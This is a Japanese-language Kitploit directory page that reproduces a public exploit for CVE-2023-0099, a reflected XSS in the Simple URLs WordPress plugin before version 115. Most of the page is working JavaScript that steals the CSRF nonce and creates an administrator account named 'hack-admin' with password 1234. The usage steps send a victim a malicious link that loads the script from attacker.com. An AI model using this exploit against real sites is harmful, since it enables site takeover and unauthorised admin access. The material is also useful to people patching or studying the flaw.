Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-0099-exploit — 115未満の単純なURL - リフレクション型XSS | Kitploit
ツール/GitHubGitHub/amirzargham/cve-2023-0099-exploit
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubamirzargham/cve-2023-0099-exploit

CVE-2023-0099-exploit

115未満の単純なURL - リフレクション型XSS

リポジトリを見る
612年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-0099-エクスプロイト

エクスプロイトタイトル: simple urls < 115 - 反射型XSS

Google Dork:

エクスプロイト作者: AmirZargham

ベンダーホームページ: https://getlasso.co/

ソフトウェアリンク: https://wordpress.org/plugins/simple-urls/

バージョン: < 115

テスト環境: firefox,chrome

CVE: CVE-2023-0099

CWE: CWE-79

プラットフォーム: 複数

タイプ: WebApps

説明 Simple URLs WordPress プラグインのバージョン115未満は、一部のパラメータをサニタイズおよびエスケープせずにいくつかのページに出力するため、反射型クロスサイトスクリプティング (Reflected XSS) が発生し、管理者などの高権限ユーザーに対して悪用される可能性があります。

エクスプロイト:

root@kitploit:~
function getCSRFToken(url, csrf_token_id, func){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var parser = new DOMParser();
var htmlDocument = parser.parseFromString(this.responseText, "text/html");
var token = htmlDocument.getElementById(csrf_token_id).value;
func(token);
}

};
xhr.open("GET", url, true);
xhr.withCredentials = true;
xhr.send();

}

function addAdmin(token){
var xhr = new XMLHttpRequest();
xhr.open("POST","http://vulnerable.site/wp-admin/user-new.php", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("action=createuser&_wpnonce_create-user=" + token + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=hack-admin&[email protected]&first_name=&last_name=&url=&pass1=1234&pass2=1234&pw_weak=on&send_user_notification=1&role=administrator&createuser=Add+New+User");
}

getCSRFToken("http://vulnerable.site/wp-admin/user-new.php", "_wpnonce_create-user", addAdmin);

使用方法:

  1. エクスプロイトコードをJavaScriptファイルとしてサーバーに保存します。
  2. エクスプロイトファイル内の次の値を変更します:
    • user_login: 任意のユーザー名
    • pass1: 任意のパスワード
    • pass2: 任意のパスワード
    • email: 任意のメールアドレス
  3. 被害者に悪意のあるリンクを送信します: https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=</script><script src="https://attacker.com/exploit.js"></script>
  4. 管理者ユーザーが作成されたら、/wp-admin などに移動し、WordPress パネルにログインします。

公開元: exploit-db.

公開元: 0day.today.

公開元: packet storm.

ツールをダウンロード